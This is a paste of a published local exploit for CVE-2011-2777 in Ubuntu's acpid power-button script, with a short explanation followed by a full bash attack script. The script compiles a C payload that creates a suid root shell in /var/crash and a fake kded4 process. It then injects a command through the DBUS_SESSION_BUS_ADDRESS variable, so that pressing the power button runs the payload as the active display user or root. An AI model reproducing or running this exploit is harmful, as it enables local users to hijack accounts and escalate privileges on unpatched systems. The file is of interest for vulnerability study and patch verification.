
Acpid 1:2.0.10-1ubuntu2 Privilege Boundary Crossing Vulnerab

Aug 29th, 2012
  1. Exploit Title: Acpid Privilege Boundary Crossing Vulnerability
  2. Google Dork:
  3. Date: 23-11-2011
  4. Author: otr
  5. Software Link: https://launchpad.net/ubuntu/+source/acpid
  6. Version: 1:2.0.10-1ubuntu2
  7. Tested on: Ubuntu 11.10, Ubuntu 11.04
  8. CVE : CVE-2011-2777
  9. --
  10. Safeguard this letter, it may be an IMPORTANT DOCUMENT
  11.  
  12. #!/bin/bash
  13. #
  14. # otr
  15. #
  16. # The following script is executed when pressing the power button on an Ubuntu
  17. # 11.10 system. Depending on how far we get in the condition in the code
  18. # fragement, it is possible for another user on the local system to gain the
  19. # privileges of the user who has the currently focused display running. The
  20. # vulnerability only triggers when certain power management programms are not
  21. # running, especially kded4 and the programms in the $PMS variable need not to
  22. # be running in order for this to be exploitable.
  23. #
  24. # This exploit would be more reliable when having a way to dos
  25. # gnome-power-manager Also it would be more fun one could trick the getXuser
  26. # function into setting $XUSER to root. In the case of root being the user on
  27. # the active display this exploit turns into a privilege escalation
  28. #
  29. # Exploitable file /etc/acpi/powerbtn.sh
  30. # In original source code line 40
  31. #
  32. # --
  33. # PMS="gnome-power-manager kpowersave xfce4-power-manager"
  34. # PMS="$PMS guidance-power-manager.py dalston-power-applet"
  35. #
  36. # if pidof x $PMS > /dev/null ||
  37. # ( test "$XUSER" != "" && \
  38. # pidof dcopserver > /dev/null && \
  39. # test -x /usr/bin/dcop && \
  40. # /usr/bin/dcop --user $XUSER kded kded loadedModules \
  41. # | grep -q klaptopdaemon) ||
  42. # ( test "$XUSER" != "" && \
  43. # test -x /usr/bin/qdbus && \
  44. # test -r /proc/$(pidof kded4)/environ && \
  45. # su - $XUSER -c \
  46. # "eval $(echo -n 'export '; cat /proc/$(pidof kded4)/environ | \
  47. # tr '\0' '\n' | \
  48. # grep DBUS_SESSION_BUS_ADDRESS); \
  49. # qdbus org.kde.kded" | \
  50. # grep -q powerdevil) ;\
  51. # then
  52. # --
  53. #
  54. # The problem here is that the output of cat /proc/$(pidof kded4)/environ is
  55. # controllable by a local user by exporting the DBUS_SESSION_BUS_ADDRESS
  56. # variable and running a programm called kded4.
  57. # Using this environment variable the attack is able to inject arbitrary shell
  58. # commands into the eval expression which will be executed with the rights
  59. # of $XUSER which is the user with the currently active display.
  60. #
  61. # /usr/share/acpi-support/policy-funcs in the PowerDevilRunning function
  62. # has similar code but it seems that under normal conditions this only
  63. # allows to run code with the privileges one already has.
  64.  
  65. PAYLOADEXE="/var/crash/payload"
  66. PAYLOADC="/var/crash/payload.c"
  67.  
  68. KDEDC="kded4.c"
  69. KDEDEXE="kded4"
  70.  
  71. TRIGGER="/etc/acpi/powerbtn.sh"
  72.  
  73. rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC
  74.  
  75. echo "[+] Setting umask to 0 so we have world writable files."
  76. umask 0
  77.  
  78.  
  79. echo "[+] Preparing binary payload."
  80. # we _try_ to get a suid root shell, if not we only get a
  81. # shell for another user
  82. cat > $PAYLOADC <<_EOF
  83. #include <sys/stat.h>
  84. void main(int argc, char **argv)
  85. {
  86. if(!strstr(argv[0],"shell")){
  87. printf("[+] Preparing suid shell.\n");
  88. system("cp /var/crash/payload /var/crash/shell");
  89. setuid(0);
  90. setgid(0);
  91. chown ("/var/crash/shell", 0, 0);
  92. chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
  93. }else{
  94. execl("/bin/sh", "/bin/sh", "-i", 0);
  95. }
  96. }
  97. _EOF
  98. gcc -w -o $PAYLOADEXE $PAYLOADC
  99.  
  100. echo "[+] Preparing fake kded4 process."
  101. cat > $KDEDC <<_EOF
  102. #include <unistd.h>
  103. void main (){
  104. while(42){
  105. sleep(1);
  106. if( access( "/var/crash/shell" , F_OK ) != -1 ) {
  107. execl("/var/crash/shell", "/var/crash/shell", "-i", 0);
  108. exit(0);
  109. }
  110. }
  111. }
  112. _EOF
  113.  
  114. gcc -w -o $KDEDEXE $KDEDC
  115. rm -f $KDEDC $PAYLOADC
  116.  
  117. echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
  118. export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"
  119.  
  120. echo "[+] Starting kded4."
  121. echo "[+] Trying to PMS the system."
  122. echo "[+] Waiting for the power button to be pressed."
  123. echo "[+] You'll get a shell on this console."
  124. ./$KDEDEXE
  125.  
  126. rm $KDEDEXE